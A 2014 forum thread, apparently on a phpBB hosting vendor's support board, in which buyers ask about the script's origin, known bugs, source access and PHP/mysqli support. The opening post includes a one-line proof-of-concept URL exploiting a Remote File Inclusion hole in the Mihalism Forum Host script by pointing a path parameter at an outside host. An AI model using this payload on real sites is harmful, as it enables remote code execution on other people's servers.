Page 1 of 2

Some interesting Questons to PHPBBHS

Posted: 17 Sep 2014, 09:31
by Jason
Hi,

i have a queston.
Have you build up this solution from an other hosting script? Is it based on the Mihalism Forum Script or is it a complete new Software coded by you guys?

For example...
I´ve tested that Mihalism Forum Host Solution but there are many old code fragments and it is hackable coz there is a Remote File Inclusion Vulnerability.
POC:

Code: Select all

http://target-domain.com/source/includes/load_forum.php?mfh_root_path=http://darksource.net/remote/ssh
Are any issues known on your forum hosting solution?
Has it any Bugs? I need to know it before i buy it.
So i know how many time i need to spend on developing.

And one queston more...
Ähm, are the source uncrypted or public?
Can i customize the sourcecode?


Thanks a lot, Jason
PS: By the way, you´ve an SQL ERROR on your db for the 'field list' column [1054], it does not exist. Watch your error logs! ;)

Re: Some interessting Questons to PHPBBHS

Posted: 17 Sep 2014, 09:40
by PHPBBHS
This is our own script built from the ground up not based on any other project. We take security seriously and there are no known security issues.

No major known issues. But there will always be bugs/issues with software that is the nature of software nothing is perfect.
You can check our online demo from a userside and from admin side at
http://phpbbhs.com/demo.html

Source code is unencrypted you can customize it anyway you wish for use on your own forum hosting service.



For the sql error what page is that on?

Re: Some interessting Questons to PHPBBHS

Posted: 17 Sep 2014, 10:11
by Jason
Oh great, this is the answer which I had hoped!

You are absolutly right dude, any Software has Bugs.
Everyone makes mistakes, private persons, companies and governments... lol :lol:

Thanks for the quick reply.
Regarding the SQL Errors I will send you a private message!


Keep up the good work!


Best regards, Jason

Re: Some interesting Questons to PHPBBHS

Posted: 21 Sep 2014, 06:33
by Jason
Hey, i´ve a new queston!
What happend with the echoPHP project?
Is this the same hosting solution like this one here or have it more improvements?
The pricing is not the same, where are the differences between phpBBhs and echoPHP?

Thanks in advance, Jason

Re: Some interesting Questons to PHPBBHS

Posted: 21 Sep 2014, 10:51
by PHPBBHS
Different feature sets.
But same phpBB version

phpBBHS has newer code.
echoPHP has some other features that phpBBHS doesn't have.
We have demos for both so you can decide which is best for you.

Re: Some interesting Questons to PHPBBHS

Posted: 16 Nov 2014, 21:47
by clinton4
does both versions support mysqli?

Re: Some interesting Questons to PHPBBHS

Posted: 16 Nov 2014, 21:53
by PHPBBHS
Neither script does

Re: Some interesting Questons to PHPBBHS

Posted: 16 Nov 2014, 21:58
by clinton4
Does both scripts support newer versions of php then? where mysql has deprecated?

Re: Some interesting Questons to PHPBBHS

Posted: 16 Nov 2014, 22:03
by PHPBBHS
Nope no plans at the moment. Doesn't become an issue to php 5.6/php 6.0.
phpBBHS should be good to 5.5
echoPHP good to php 5.3

If you are on a newer php version we suggest to downgrade to an older php version.

I plan on writing a new script instead to work with the newer php versions.

Re: Some interesting Questons to PHPBBHS

Posted: 16 Nov 2014, 22:14
by clinton4
Ohh... Downgrade PHP is not an option, then i'll have to abandon phpbbhs.

Just to let you know, you should give such infomation in the scripts requirements information. Using terms like "or higher" and "or newer" for PHP versions is not true then :)